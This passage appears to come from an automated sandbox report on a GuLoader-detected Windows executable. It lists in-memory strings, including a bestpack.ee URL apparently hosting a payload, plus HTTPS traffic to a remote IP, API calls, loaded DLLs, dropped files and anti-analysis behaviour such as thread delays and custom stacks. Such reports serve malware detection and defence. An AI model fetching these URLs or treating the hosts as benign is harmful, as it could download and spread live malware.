SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305963490.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72802564337.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75078811291.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486784699.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74965012912.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74851095828.00000000066BA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916255979.00000000066BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/slo.binked
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/slo.binmR
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74395501664.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144571670.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258455659.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916629062.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714567079.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030912520.00000000066B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73600667395.00000000066B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bestpack.ee/tpack.ee/-end-point:
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75532844773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73144493078.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75419392263.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75305885412.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73714163433.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74737118310.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72801998690.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72118854525.00000000066CD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73486212959.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73372304970.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74509067339.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72005247769.00000000066D5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74964852204.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72286211285.00000000066D1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73030411499.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000002.76733975773.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72916087709.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.72687881385.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.75192249873.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.74622911186.00000000066D4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000003.73258321058.00000000066D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownHTTPS traffic detected: 185.86.211.137:443 -> 192.168.11.20:49761 version: TLS 1.2
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E5
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_00406C3F0_2_00406C3F
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_70591BFF0_2_70591BFF
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000000.00000000.71623775698.000000000044C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenygifte.exe4 vs SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, 00000002.00000000.71907439558.000000000044C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenygifte.exe4 vs SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal60.troj.evad.winEXE@3/9@1/1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_00404991 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404991
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_004021AF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004021AF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeFile created: C:\Users\user\polaritetsJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeFile created: C:\Users\user\AppData\Local\Temp\nsr7DD9.tmpJump to behavior
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeReversingLabs: Detection: 50%
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000002.00000002.76719471404.0000000003592000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.72566552229.0000000006D62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_70591BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70591BFF
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_705930C0 push eax; ret 0_2_705930EE
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeFile created: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeAPI/Special instruction interceptor: Address: 73F9C1E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeAPI/Special instruction interceptor: Address: 3C29C1E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe TID: 1540Thread sleep count: 31 > 30Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe TID: 1540Thread sleep time: -310000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
